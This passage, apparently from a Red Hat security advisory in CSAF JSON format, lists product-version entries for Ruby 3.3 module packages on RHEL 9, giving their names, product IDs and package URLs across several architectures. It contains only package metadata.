"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3",
"product": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src (ruby:3.3)",
"product_id": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=src\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"product": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src (ruby:3.3)",
"product_id": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=src\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"product": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src (ruby:3.3)",
"product_id": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=src\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3)",
"product_id": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3)",
"product_id": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debuginfo@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3)",
"product_id": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debugsource@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3)",
"product_id": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3)",
"product_id": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debuginfo@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64 (ruby:3.3)",
"product_id": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debugsource@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64 (ruby:3.3)",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=x86_64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-default-gems@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-doc@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bundler@2.5.22-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-irb@1.13.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-minitest@5.20.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"product": {
"name": "rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch (ruby:3.3)",
"product_id": "rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-doc@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"product": {
"name": "rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch (ruby:3.3)",
"product_id": "rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-doc@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-power_assert@2.0.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rake@13.1.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rdoc@6.6.3.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rexml@3.4.4-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rss@0.3.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-test-unit@3.6.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-typeprof@0.21.9-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygems@3.5.22-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product": {
"name": "rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch (ruby:3.3)",
"product_id": "rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"product_identification_helper": {
